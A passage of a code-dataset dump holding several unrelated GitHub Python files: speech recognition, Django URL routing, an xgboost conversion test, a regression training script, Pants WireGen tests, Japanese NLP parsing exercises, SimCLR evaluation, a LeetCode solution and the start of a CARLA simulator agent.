Programming/unique_paths.py","file_name":"unique_paths.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"39966067888","text":"import speech_recognition as sr\n\ndef recon(reconhecedor,microfone):\n with microfone as somprincipal:\n reconhecedor.adjust_for_ambient_noise(somprincipal)\n audio = reconhecedor.listen(somprincipal)\n\n response = {\n \"sucesso\": True,\n \"erro\": None,\n \"transcricao\":None\n }\n\n try:\n response[\"transcricao\"] = reconhecedor.recognize_google(audio, language='pt-BR')\n \n except sr.RequestError:\n response[\"sucesso\"] = False\n response[\"erro\"] = \"API não disponivel\"\n \n except sr.UnknownValueError:\n response[\"erro\"] = \"Não entendi sua fala\"\n \n return response\n\nif __name__ == \"__main__\":\n reconhecedor = sr.Recognizer()\n microfone = sr.Microphone()\n\n NFALA = 10\n NSEMFALA = 10\n\n print('\\n### Programa funcionando ###')\n\n for i in range(NFALA):\n for j in range(NSEMFALA):\n print('\\n TESTE {} - Fale no microfone \\n'.format(i+1))\n\n somteste = recon(reconhecedor, microfone)\n\n if somteste[\"transcricao\"]:\n break\n if not somteste[\"sucesso\"]:\n break\n print(\"Eu não entendi. repita\\n\")\n\n if somteste[\"erro\"]:\n print(\"erro: {} \\n\".format(somteste[\"erro\"]))\n\n print(\"Voce disse: {}\".format(somteste[\"transcricao\"]))","repo_name":"Matthwhy/IA_de_transcricao_de_audio","sub_path":"voiceIA.py","file_name":"voiceIA.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35581082744","text":"# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView\nfrom django.contrib.sitemaps.views import sitemap\nfrom .sitemap import StaticViewSitemap\nfrom main import views as main_views\n\n\nrobots = 'User-agent: *\\n' \\\n 'Disallow: /admin\\n' \\\n 'Sitemap: https://digitalrush.ru/sitemap.xml'\n\nsitemaps = {\n 'static': StaticViewSitemap,\n }\n\nmanifest = '{\"name\":\"DigitalRush\",' \\\n '\"short_name\":\"digitalrush\",' \\\n '\"start_url\":\"/\",' \\\n '\"display\":\"standalone\",' \\\n '\"theme_color\":\"#000\",' \\\n '\"background_color\":\"#000\",' \\\n '\"description\":\"digital-агентство по разработке и продвижению сайтов\",' \\\n '\"serviceworker\":{\"src\": \"/sw.js\"},' \\\n '\"icons\":' \\\n '[{\"src\":\"static/img/favicon-16x16.png\",' \\\n '\"sizes\":\"16x16\",' \\\n '\"type\":\"image/png\"},' \\\n '{\"src\":\"static/img/favicon-32x32.png\",' \\\n '\"sizes\":\"32x32\",' \\\n '\"type\":\"image/png\"},' \\\n '{\"src\":\"static/img/favicon-196x196.png\",' \\\n '\"sizes\":\"196x196\",' \\\n '\"type\":\"image/png\"},' \\\n '{\"src\":\"static/img/favicon-512x512.png\",' \\\n '\"sizes\":\"512x512\",' \\\n '\"type\":\"image/png\"}]}'\n\nadmin.autodiscover()\n\nurlpatterns = [\n path('grappelli/', include('grappelli.urls')),\n path('admin/', admin.site.urls),\n path('', include('main.urls')),\n path('robots.txt', lambda r: HttpResponse(robots, content_type=\"text/plain\")),\n path('sitemap.xml', sitemap, {'sitemaps': sitemaps}, name='django.contrib.sitemaps.views.sitemap'),\n path('manifest.json', lambda r: HttpResponse(manifest, content_type=\"application/json\")),\n path('sw.js', (TemplateView.as_view(template_name=\"sw.js\", content_type='application/javascript', )), name='sw.js'),\n]\n\nhandler404 = main_views.error_404\nhandler500 = main_views.error_500\n","repo_name":"EclipseAltair/digitalrush","sub_path":"digitalrush/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"20378424010","text":"import pytest\nimport sys\nimport numpy as np\n\ntry:\n import xgboost\n from xgboost import XGBClassifier\nexcept ImportError:\n pass\nfrom sklearn.datasets import load_iris\n\nfrom pure_sklearn.map import convert_estimator\n\nMETHODS = [\"predict\", \"predict_proba\"]\n\n\n@pytest.mark.skipif(\"xgboost\" not in sys.modules, reason=\"requires xgboost\")\ndef test_xgboost():\n X, y = load_iris(return_X_y=True)\n X_ = X.tolist()\n for y_ in [y, (y == 0).astype(int), (y == 2).astype(int)]:\n for n_estimators in [2, 10]:\n for max_depth in [3, 10]:\n clf = XGBClassifier(\n booster=\"gbtree\",\n random_state=5,\n n_estimators=n_estimators,\n max_depth=max_depth,\n )\n clf.fit(X, y_)\n clf_ = convert_estimator(clf)\n for method in METHODS:\n scores = getattr(clf, method)(X)\n scores_ = getattr(clf_, method)(X_)\n assert np.allclose(scores, scores_, equal_nan=True)\n","repo_name":"Ibotta/pure-predict","sub_path":"pure_sklearn/xgboost/tests/test_xgboost.py","file_name":"test_xgboost.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"38"} +{"seq_id":"24977904437","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport pickle\n\n\n##Reading the csv file\ndf = pd.read_csv('ai4i2020.csv')\n\ndf.head() # Checking the first five rows of dataset.\ndf.info() # printing the summary of dataset\ndf.isnull().sum() #Checking the missing value in dataset\n\n# df = df.fillna(method='mean') # Filling null value with mean value\n\n#Droping the column which is not going to use for feature prediction\n\ndf.drop(['Product ID','UDI'],axis=1,inplace=True)\n\n# Convert categorial features into numerical\ndf = pd.get_dummies(df,columns=['Type'],drop_first=True)\n\n\n#Assign new index to database last index as prediction result\n\nnew_column = ['Air temperature [K]','Process temperature [K]','Rotational speed [rpm]','Torque [Nm]',\n 'Tool wear [min]','TWF','HDF','PWF','OSF','RNF','Machine failure']\n\ndf = df.reindex(columns=new_column)\n\n# Convert all the data into standscaler\nfrom sklearn.preprocessing import StandardScaler\nscaler = StandardScaler()\nx = df.iloc[:,0:-1]\ny = df.iloc[:,-1]\n\n\narr = scaler.fit_transform(x)\n\n# check multi-corelation with each features\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\nvia_df = pd.DataFrame()\nvia_df['vif'] = [variance_inflation_factor(arr,i) for i in range(arr.shape[1])]\nvia_df['feature'] = x.columns\n\n\n# convert dataset into train and test\nfrom sklearn.model_selection import train_test_split\nx_train,x_test,y_train,y_test = train_test_split(arr,y,test_size=0.33,random_state=0)\n\n# Train dataset on linearmodel\n\nfrom sklearn.linear_model import LinearRegression\nlinear = LinearRegression()\nlinear.fit(x_train,y_train)\n\n# check score before add new data\nfrom sklearn.metrics import r2_score\nscore = r2_score(linear.predict(x_test),y_test)\nprint(score)\n\n# Saving the model into the local file system\nfilename = 'finalized_model_for_car.pickle'\npickle.dump(linear,open(filename,'wb'))\n\n# #Prediction using save model\nloaded_model = pickle.load(open(filename,'rb'))\n\n\n\n\n","repo_name":"hgoswami007/checkMachineFailure","sub_path":"trainModel.py","file_name":"trainModel.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33399810324","text":"from __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport os\nfrom textwrap import dedent\n\nfrom twitter.common.collections import OrderedSet\n\nfrom pants.backend.codegen.register import build_file_aliases as register_codegen\nfrom pants.backend.codegen.targets.java_wire_library import JavaWireLibrary\nfrom pants.backend.codegen.tasks.wire_gen import WireGen\nfrom pants.backend.core.register import build_file_aliases as register_core\nfrom pants.backend.jvm.targets.jar_dependency import JarDependency\nfrom pants.backend.jvm.targets.jar_library import JarLibrary\nfrom pants.base.exceptions import TaskError\nfrom pants.base.revision import Revision\nfrom pants.base.source_root import SourceRoot\nfrom pants.base.target import Target\nfrom pants.base.validation import assert_list\nfrom pants.util.contextutil import temporary_file\nfrom pants_test.tasks.task_test_base import TaskTestBase\n\n\nclass WireGenTest(TaskTestBase):\n\n EXPECTED_TASK_PATH = \".pants.d/pants_backend_codegen_tasks_wire_gen_WireGen/isolated\"\n\n @classmethod\n def task_type(cls):\n return WireGen\n\n @property\n def alias_groups(self):\n return register_core().merge(register_codegen())\n\n def assert_files(self, task, rel_path, contents, service_writer, expected_files):\n assert_list(expected_files)\n\n with temporary_file() as fp:\n fp.write(contents)\n fp.close()\n self.assertEqual(set(expected_files),\n task.calculate_genfiles(fp.name, rel_path, service_writer))\n\n def assert_java_files(self, task, rel_path, contents, service_writer, expected_files):\n self.assert_files(task, rel_path, contents, service_writer, expected_files)\n\n def test_plain(self):\n task = self.create_task(self.context())\n self.assert_java_files(\n task,\n 'temperatures.proto',\n '''\n package org.pantsbuild.example.temperature;\n\n /**\n * Structure for expressing temperature: 75 Fahrenheit, 12 Celsius, etc.\n * Not so useful on its own.\n */\n message Temperature {\n optional string unit = 1;\n required int64 number = 2;\n }\n ''',\n None,\n ['org/pantsbuild/example/temperature/Temperature.java'])\n\n self.assert_java_files(\n task,\n 'temperatures.proto',\n 'package org.pantsbuild.example.temperature',\n None,\n [])\n\n def test_custom_package(self):\n task = self.create_task(self.context())\n self.assert_java_files(\n task,\n 'freds.proto',\n '''\n package com.twitter.ads.revenue_tables;\n option java_package = \"com.example.foo.bar\";\n\n message Fred {\n optional string name = 1;\n }\n ''',\n None,\n ['com/example/foo/bar/Fred.java'])\n\n self.assert_java_files(\n task,\n 'bam_bam.proto',\n 'option java_package = \"com.example.baz.bip\";',\n None,\n [])\n\n self.assert_java_files(\n task,\n 'bam_bam.proto',\n '''\n option java_package=\"com.example.baz.bip\" ;\n\n message BamBam {\n optional string name = 1;\n }\n ''',\n None,\n ['com/example/baz/bip/BamBam.java'])\n\n self.assert_java_files(\n task,\n 'fred.proto',\n '''\n option java_package = \"com.example.foo.bar\";\n package com.twitter.ads.revenue_tables;\n\n ''',\n None,\n [])\n\n def test_service_writer(self):\n task = self.create_task(self.context())\n self.assert_java_files(\n task,\n 'pants.proto',\n '''\n package pants.preferences;\n option java_multiple_files = true;\n option java_package = \"org.pantsbuild.protos.preferences\";\n service SomeService {\n rpc SomeRpc();\n rpc AnotherRpc() {\n }\n rpc AndAnother() {}\n }\n ''',\n 'com.squareup.wire.SimpleServiceWriter',\n ['org/pantsbuild/protos/preferences/SomeService.java'])\n\n def test_calculate_sources(self):\n self.add_to_build_file('wire-lib', dedent('''\n java_wire_library(name='wire-target',\n sources=['foo.proto'],\n )\n '''))\n target = self.target('wire-lib:wire-target')\n context = self.context(target_roots=[target])\n task = self.create_task(context)\n result = task._calculate_sources([target])\n self.assertEquals(1, len(result.keys()))\n self.assertEquals(OrderedSet(['wire-lib/foo.proto']), result['wire-lib'])\n\n def test_calculate_sources_with_source_root(self):\n SourceRoot.register('project/src/main/wire')\n self.add_to_build_file('project/src/main/wire/wire-lib', dedent('''\n java_wire_library(name='wire-target',\n sources=['foo.proto'],\n )\n '''))\n target = self.target('project/src/main/wire/wire-lib:wire-target')\n context = self.context(target_roots=[target])\n task = self.create_task(context)\n result = task._calculate_sources([target])\n self.assertEquals(1, len(result.keys()))\n self.assertEquals(OrderedSet(['project/src/main/wire/wire-lib/foo.proto']), result['project/src/main/wire'])\n\n def test_sources_generated_by_target(self):\n root_path = os.path.join('project', 'src', 'main', 'wire')\n wire_path = os.path.join(root_path, 'wire-lib')\n file_path = os.path.join(wire_path, 'org', 'pantsbuild', 'example', 'foo.proto')\n SourceRoot.register(root_path)\n self.add_to_build_file(wire_path, dedent('''\n java_wire_library(name='wire-target',\n sources=['{0}'],\n )\n '''.format(os.path.relpath(file_path, wire_path))))\n self.create_dir(os.path.dirname(file_path))\n self.create_file(file_path, dedent('''\n package org.pantsbuild.example;\n\n message Foo {\n optional string bar = 1;\n optional string foobar = 2;\n }\n '''))\n target = self.target('project/src/main/wire/wire-lib:wire-target')\n context = self.context(target_roots=[target])\n task = self.create_task(context)\n previous_working_directory = os.path.abspath('.')\n os.chdir(os.path.abspath(self.build_root))\n result = task.sources_generated_by_target(target)\n os.chdir(previous_working_directory)\n self.assertEquals(OrderedSet(['org/pantsbuild/example/Foo.java']), OrderedSet(result))\n\n def _create_fake_wire_tool(self, version='1.6.0'):\n self.make_target(':wire-compiler', JarLibrary, jars=[\n JarDependency(org='com.squareup.wire', name='wire-compiler', rev=version),\n ])\n\n def test_compiler_args(self):\n self._create_fake_wire_tool()\n SourceRoot.register('wire-src')\n simple_wire_target = self.make_target('wire-src:simple-wire-target', JavaWireLibrary,\n sources=['foo.proto'])\n context = self.context(target_roots=[simple_wire_target])\n task = self.create_task(context)\n self.assertEquals([\n '--java_out={}/{}/wire-src.simple-wire-target'.format(self.build_root,\n self.EXPECTED_TASK_PATH),\n '--proto_path={}/wire-src'.format(self.build_root),\n 'foo.proto'],\n task.format_args_for_target(simple_wire_target))\n\n def test_compiler_args_wirev1(self):\n self._create_fake_wire_tool()\n SourceRoot.register('wire-src')\n wire_targetv1 = self.make_target('wire-src:wire-targetv1', JavaWireLibrary,\n sources=['bar.proto'],\n service_writer='org.pantsbuild.DummyServiceWriter',\n service_writer_options=['opt1', 'opt2'])\n task = self.create_task(self.context(target_roots=[wire_targetv1]))\n self.assertEquals([\n '--java_out={}/{}/wire-src.wire-targetv1'.format(self.build_root, self.EXPECTED_TASK_PATH),\n '--service_writer=org.pantsbuild.DummyServiceWriter',\n '--service_writer_opt', 'opt1',\n '--service_writer_opt', 'opt2',\n '--proto_path={}/wire-src'.format(self.build_root),\n 'bar.proto'],\n task.format_args_for_target(wire_targetv1))\n\n def test_compiler_wire2_with_writer_errors(self):\n self._create_fake_wire_tool(version='2.0.0')\n SourceRoot.register('wire-src')\n wire_targetv1 = self.make_target('wire-src:wire-targetv1', JavaWireLibrary,\n sources=['bar.proto'],\n service_writer='org.pantsbuild.DummyServiceWriter',\n service_writer_options=['opt1', 'opt2'])\n task = self.create_task(self.context(target_roots=[wire_targetv1]))\n with self.assertRaises(TaskError):\n task.format_args_for_target(wire_targetv1)\n\n def test_compiler_wire1_with_factory_errors(self):\n self._create_fake_wire_tool()\n SourceRoot.register('wire-src')\n wire_targetv2 = self.make_target('wire-src:wire-targetv2', JavaWireLibrary,\n sources=['baz.proto'],\n service_factory='org.pantsbuild.DummyServiceFactory',\n service_factory_options=['v2opt1', 'v2opt2'])\n task = self.create_task(self.context(target_roots=[wire_targetv2]))\n with self.assertRaises(TaskError):\n task.format_args_for_target(wire_targetv2)\n\n def test_compiler_args_wirev2(self):\n self._create_fake_wire_tool(version='2.0.0')\n SourceRoot.register('wire-src')\n wire_targetv2 = self.make_target('wire-src:wire-targetv2', JavaWireLibrary,\n sources=['baz.proto'],\n service_factory='org.pantsbuild.DummyServiceFactory',\n service_factory_options=['v2opt1', 'v2opt2'])\n task = self.create_task(self.context(target_roots=[wire_targetv2]))\n self.assertEquals([\n '--java_out={}/{}/wire-src.wire-targetv2'.format(self.build_root, self.EXPECTED_TASK_PATH),\n '--service_factory=org.pantsbuild.DummyServiceFactory',\n '--service_factory_opt', 'v2opt1',\n '--service_factory_opt', 'v2opt2',\n '--proto_path={}/wire-src'.format(self.build_root),\n 'baz.proto'],\n task.format_args_for_target(wire_targetv2))\n\n def test_compiler_args_all(self):\n self._create_fake_wire_tool(version='2.0.0')\n SourceRoot.register('wire-src')\n kitchen_sink = self.make_target('wire-src:kitchen-sink', JavaWireLibrary,\n sources=['foo.proto', 'bar.proto', 'baz.proto'],\n registry_class='org.pantsbuild.Registry',\n service_factory='org.pantsbuild.DummyServiceFactory',\n no_options=True,\n roots=['root1', 'root2', 'root3'],\n enum_options=['enum1', 'enum2', 'enum3'],)\n task = self.create_task(self.context(target_roots=[kitchen_sink]))\n self.assertEquals([\n '--java_out={}/{}/wire-src.kitchen-sink'.format(self.build_root, self.EXPECTED_TASK_PATH),\n '--no_options',\n '--service_factory=org.pantsbuild.DummyServiceFactory',\n '--registry_class=org.pantsbuild.Registry',\n '--roots=root1,root2,root3',\n '--enum_options=enum1,enum2,enum3',\n '--proto_path={}/wire-src'.format(self.build_root),\n 'foo.proto',\n 'bar.proto',\n 'baz.proto'],\n task.format_args_for_target(kitchen_sink))\n\n def test_compiler_args_proto_paths(self):\n self._create_fake_wire_tool(version='2.0.0')\n SourceRoot.register('wire-src')\n SourceRoot.register('wire-other-src')\n parent_target = self.make_target('wire-other-src:parent-target', JavaWireLibrary,\n sources=['bar.proto'])\n simple_wire_target = self.make_target('wire-src:simple-wire-target', JavaWireLibrary,\n sources=['foo.proto'], dependencies=[parent_target])\n context = self.context(target_roots=[parent_target, simple_wire_target])\n task = self.create_task(context)\n self.assertEquals([\n '--java_out={}/{}/wire-src.simple-wire-target'.format(self.build_root,\n self.EXPECTED_TASK_PATH),\n '--proto_path={}/wire-src'.format(self.build_root),\n '--proto_path={}/wire-other-src'.format(self.build_root),\n 'foo.proto'],\n task.format_args_for_target(simple_wire_target))\n\n def test_wire_compiler_version_robust(self):\n # Here the wire compiler is both indirected, and not 1st in the classpath order.\n guava = self.make_target('3rdparty:guava',\n JarLibrary,\n jars=[JarDependency('com.google.guava', 'guava', '18.0')])\n wire = self.make_target('3rdparty:wire',\n JarLibrary,\n jars=[\n JarDependency('com.squareup.wire', 'wire-compiler', '3.0.0')\n .exclude('com.google.guava', 'guava')\n ])\n alias = self.make_target('a/random/long/address:spec', Target, dependencies=[guava, wire])\n self.set_options(wire_compiler='a/random/long/address:spec')\n task = self.create_task(self.context(target_roots=[alias]))\n self.assertEqual(Revision(3, 0, 0), task.wire_compiler_version)\n\n def test_wire_compiler_version_none(self):\n guava = self.make_target('3rdparty:guava',\n JarLibrary,\n jars=[JarDependency('com.google.guava', 'guava', '18.0')])\n self.set_options(wire_compiler='3rdparty:guava')\n task = self.create_task(self.context(target_roots=[guava]))\n with self.assertRaises(task.WireCompilerVersionError):\n task.wire_compiler_version\n\n def test_wire_compiler_version_conflict(self):\n george = self.make_target('3rdparty:george',\n JarLibrary,\n jars=[JarDependency('com.squareup.wire', 'wire-compiler', '3.0.0'),\n JarDependency('com.squareup.wire', 'wire-compiler', '1.6.0')])\n self.set_options(wire_compiler='3rdparty:george')\n task = self.create_task(self.context(target_roots=[george]))\n with self.assertRaises(task.WireCompilerVersionError):\n task.wire_compiler_version\n","repo_name":"praveen-srinivasan/pants","sub_path":"tests/python/pants_test/backend/codegen/tasks/test_wire_gen.py","file_name":"test_wire_gen.py","file_ext":"py","file_size_in_byte":14219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"9729908365","text":"# coding: utf-8\nimport CaboCha\nimport pydotplus\nimport subprocess\n\"\"\"\nnlp_40.py\n\n40. 係り受け解析結果の読み込み(形態素)\n\n形態素を表すクラスMorphを実装せよ.このクラスは表層形(surface),基本形(base),品詞(pos),\n品詞細分類1(pos1)をメンバ変数に持つこととする.\nさらに,CaboChaの解析結果(neko.txt.cabocha)を読み込み,各文をMorphオブジェクトのリストとして表現し,\n3文目の形態素列を表示せよ.\n\"\"\"\n\ndef make_analyzed_file(input_file_name: str, output_file_name: str) -> None:\n \"\"\"cabocha fileを作る\"\"\"\n cbc = CaboCha.Parser()\n with open(input_file_name, encoding = 'utf-8') as input_file, \\\n open(output_file_name, mode = 'w', encoding = 'utf-8') as output_file:\n\n for line in input_file:\n tree = cbc.parse(line.lstrip()) # 文字列の先頭の空白文字を除去\n output_file.write(tree.toString(CaboCha.FORMAT_LATTICE))\n\n\nclass Morph:\n \"\"\" 1つの形態素を表すクラス\"\"\"\n\n def __init__(self, surface, base, pos, pos1):\n\n self.surface = surface # 表層系\n self.base = base # 基本形\n self.pos = pos # 品詞\n self.pos1 = pos1 # 品詞細分類\n\n def is_end_of_sentence(self) -> bool:\n return self.pos1 == '句点'\n\n def __str__(self) -> str:\n return 'surface: {}, base: {}, pos: {}, pos1: {}'\\\n .format(self.surface, self.base, self.pos, self.pos1)\n \ndef make_morph_list(analyzed_file_name: str) -> list:\n \"\"\"係り受け解析したファイルを読み,Morphオブジェクトとして返す\"\"\"\n \n sentences = []\n sentence = []\n with open(analyzed_file_name, encoding='utf-8') as input_file:\n \n for line in input_file:\n line_list = line.split()\n if (line_list[0] == '*') | (line_list[0] == 'EOS'):\n pass\n \n else:\n line_list = line_list[0].split(',') + line_list[1].split(',')\n # (e.f.) ['見違える', '動詞', '自立', '*', '*', '一段',\n # '基本形', '見違える', 'ミチガエル', 'ミチガエル']\n\n _morph = Morph(surface = line_list[0], base = line_list[7],\n pos = line_list[1], pos1 = line_list[2])\n\n sentence.append(_morph)\n\n if _morph.is_end_of_sentence():\n sentences.append(sentence)\n sentence = []\n \n return sentences\n \n \n \nif __name__ == '__main__':\n\n make_analyzed_file('neko.txt', 'neko.txt.cabocha')\n \n morphed_sentences = make_morph_list('neko.txt.cabocha') # 7486\n # print(len(morphed_sentences))\n\n for morph in morphed_sentences[2]:\n print(str(morph))\n\n \n \n","repo_name":"jusui/Data_Science","sub_path":"nlp100/trial_2/nlp_40.py","file_name":"nlp_40.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9729919125","text":"# coding: utf-8\nimport CaboCha\nimport pydotplus\nimport subprocess\nfrom nlp_40 import Morph\nfrom nlp_42 import make_chunk_list, is_valid_chunk\nfrom nlp_43 import Chunk\n\"\"\"\n44. 係り受け木の可視化\n\n与えられた文の係り受け木を有向グラフとして可視化せよ.\n可視化には,係り受け木をDOT言語に変換し,Graphvizを用いるとよい.また,Pythonから有向グラフを直接的に可視化するには,pydotを使うとよい.\n\"\"\"\n\ndef sentence_to_dot(idx: int, sentence: list) -> str:\n \"\"\"dot言語を作る\n https://qiita.com/rubytomato@github/items/51779135bc4b77c8c20d\n \"\"\"\n head = \"digraph sentence{} \".format(idx)\n body_head = \"{ graph [rankdir = LR]; \"\n # https://docs.python.jp/3/tutorial/controlflow.html#unpacking-argument-lists\n # リストをアンパック\n body_list = ['\"{}\"->\"{}\"; '.format(*chunk_pair.split()) for chunk_pair in sentence]\n \n return head + body_head + ''.join(body_list) + '}'\n\ndef sentences_to_dot(sentences: list ) -> list:\n \"\"\"sentenceをdot言語に変換\"\"\"\n _dots = []\n for idx, sentence in enumerate(sentences):\n # print(\"sentence :\", sentence)\n _dots.append(sentence_to_dot(idx, sentence))\n return _dots\n\ndef save_graph(dot: str, file_name: str) -> None:\n g = pydotplus.graph_from_dot_data(dot)\n g.write_jpeg(file_name, prog = 'dot')\n \n\nif __name__ == '__main__':\n\n chunked_sentences = make_chunk_list('neko.txt.cabocha')\n paired_sentences = [ [chunk.pair(sentence) for chunk in sentence \\\n if is_valid_chunk(chunk, sentence)] \\\n for sentence in chunked_sentences \\\n if len(sentence) > 1 ]\n \n dots = sentences_to_dot(paired_sentences)\n\n for idx in range(101, 104):\n save_graph(dots[idx], 'graph{}.jpg'.format(idx))\n \n","repo_name":"jusui/Data_Science","sub_path":"nlp100/trial_2/nlp_44.py","file_name":"nlp_44.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70035717552","text":"import torchvision\nimport torch\nfrom copy import deepcopy\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import preprocessing\nfrom torchvision.datasets import ImageFolder\nfrom torchvision import transforms, datasets\nfrom models.aug_simclr import SimCLRModel\ndata_transform = transforms.Compose([\n transforms.RandomResizedCrop(size=224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\ntrain_dataset = datasets.ImageFolder(root='../imagenet20',transform=data_transform)\ntest_dataset = datasets.ImageFolder(root='../imagenet20_val',transform=data_transform)\ntrain_loader = torch.utils.data.DataLoader(train_dataset,batch_size=4, shuffle=True,num_workers=4)\ntest_loader = torch.utils.data.DataLoader(test_dataset,batch_size=4, shuffle=True,num_workers=4)\n@torch.no_grad()\ndef evaluation(model):\n \n network = deepcopy(model.resnet)\n # network.projection = nn.Identity()\n network.eval()\n network.to('cuda:1')\n \n X_train_feature=[]\n y_train=[]\n X_test_feature=[]\n y_test=[]\n \n for data in train_loader:\n x, y = data\n x = x.to('cuda:1')\n features = network(x)\n X_train_feature.extend(features.cpu().detach().numpy())\n y_train.extend(y.cpu().detach().numpy())\n for data in test_loader:\n x, y = data\n x = x.to('cuda:1')\n features = network(x)\n X_test_feature.extend(features.cpu().detach().numpy())\n y_test.extend(y.cpu().detach().numpy())\n scaler = preprocessing.StandardScaler()\n scaler.fit(X_train_feature)\n X_train_feature = scaler.transform(X_train_feature)\n X_test_feature = scaler.transform(X_test_feature)\n clf = LogisticRegression(random_state=0, max_iter=10000, solver='lbfgs', C=1.0)# Multinomial Loss\n clf.fit(X_train_feature, y_train)\n print(\"Logistic Regression feature eval\")\n print(\"Train score:\", clf.score(X_train_feature, y_train))\n print(\"Test score:\", clf.score(X_test_feature, y_test))\nmodel = SimCLRModel.load_from_checkpoint('./simclr/xi4tsgxl/checkpoints/epoch=16-step=3451.ckpt')\nevaluation(model)","repo_name":"has97/Self-Supervised-Diffusion","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70912655470","text":"\"\"\"\nYou are given an array of strings arr. A string s is formed by the concatenation of a subsequence of arr that has unique characters.\n\nReturn the maximum possible length of s.\n\nA subsequence is an array that can be derived from another array by deleting some or no elements without changing the order of the remaining elements.\n\n\n\nExample 1:\n\nInput: arr = [\"un\",\"iq\",\"ue\"]\nOutput: 4\nExplanation: All the valid concatenations are:\n- \"\"\n- \"un\"\n- \"iq\"\n- \"ue\"\n- \"uniq\" (\"un\" + \"iq\")\n- \"ique\" (\"iq\" + \"ue\")\nMaximum length is 4.\n\nExample 2:\n\nInput: arr = [\"cha\",\"r\",\"act\",\"ers\"]\nOutput: 6\nExplanation: Possible longest valid concatenations are \"chaers\" (\"cha\" + \"ers\") and \"acters\" (\"act\" + \"ers\").\n\nExample 3:\n\nInput: arr = [\"abcdefghijklmnopqrstuvwxyz\"]\nOutput: 26\nExplanation: The only string in arr has all 26 characters.\n\n\n\nConstraints:\n\n 1 <= arr.length <= 16\n 1 <= arr[i].length <= 26\n arr[i] contains only lowercase English letters.\n\n\n\"\"\"\n\nfrom collections import Counter\nfrom typing import *\n\n\nclass Solution:\n def maxLength(self, arr: List[str]) -> int:\n def dfs_val(crt_set: set, arr: List[set]):\n if len(arr) == 0:\n return 0\n else:\n idx = 0\n while crt_set.intersection(arr[idx]).__len__() != 0:\n idx += 1\n if idx >= arr.__len__():\n return 0\n return max(dfs_val(crt_set, arr[idx + 1:]), arr[idx].__len__() + dfs_val(crt_set.union(arr[idx]), arr[idx + 1:]))\n\n arr = list(filter(lambda x: max(Counter(x).values()) <= 1, arr))\n arr = [set(i) for i in arr]\n return dfs_val(set(), arr)\n\n\nA = Solution()\narr = [\"un\", \"iq\", \"ue\"]\nA.maxLength(arr)\n","repo_name":"yqxd/python_medium","sub_path":"1239MaximumLengthofaConcatenatedStringwithUniqueCharacters.py","file_name":"1239MaximumLengthofaConcatenatedStringwithUniqueCharacters.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"42643567616","text":"import carla\nimport random\nimport time\nfrom agents.navigation.stand_still_agent import StandStillAgent\nfrom scenario_runner.srunner.scenariomanager.carla_data_provider import CarlaDataProvider\n\nimport numpy as np\nimport cv2\nfrom queue import Queue\n\nfrom junction_annotator import JunctionAnnotator\nfrom state_extractor import StateExtractor\n\nfrom yolov7_carla_object_detection.carla_detect import CarlaObjectDetector\nfrom typing import List, Tuple\nfrom collections import deque\nimport copy\nimport csv\nimport os\nimport subprocess\nfrom scenario_runner.srunner.tools.route_manipulation import interpolate_trajectory, interpolate_wp_trajectory\n\n\nclass DatasetGenPerceptionModelAgent:\n\n def __init__(self, start_timestamp, scenario_name, ego_junction_distance, actor_junction_distance) -> None:\n # Connect to the server\n self.client = carla.Client('localhost', 2000)\n self.client.set_timeout(1000.0) # seconds\n # Get the world\n self.world = self.client.get_world()\n\n # remove stationary env vehicles:\n env_objs = self.world.get_environment_objects(carla.CityObjectLabel.Vehicles)\n objects_to_toggle = {car.id for car in env_objs}\n self.world.enable_environment_objects(objects_to_toggle, False)\n \n self.map = self.world.get_map()\n self.dummy_tick = False\n\n self.current_image_index = 0\n self.current_rgb_image_index = 0\n self.data_collection_started = False\n self.frames_skipped = []\n self.start_timestamp = start_timestamp\n self.scenario_name = scenario_name\n self.ego_junction_distance = ego_junction_distance\n self.actor_junction_distance = actor_junction_distance\n self.no_skipped_frames = 0\n dir_path = f\"./recording/{self.start_timestamp}\"\n if not os.path.exists(dir_path):\n os.makedirs(dir_path, exist_ok=True) # Create directory if it doesn't exist\n\n\n self.ego_vehicle, self.other_vehicles = self.get_ego_and_other_vehicles()\n self.active_scenario_vehicle = self.other_vehicles[0]\n self.agent = StandStillAgent(self.ego_vehicle)\n\n # spawn the sensor and attach to vehicle.\n blueprint_library = self.world.get_blueprint_library()\n cam_bp = blueprint_library.find('sensor.camera.instance_segmentation')\n cam_bp.set_attribute('image_size_x', '608')\n cam_bp.set_attribute('image_size_y', '608')\n sensor_transform = carla.Transform(carla.Location(x=2.5, z=2))\n self.sensor = self.world.spawn_actor(cam_bp, sensor_transform, attach_to=self.ego_vehicle)\n self.sensor.listen(lambda image: self.process_img(image))\n\n\n blueprint_library = self.world.get_blueprint_library()\n 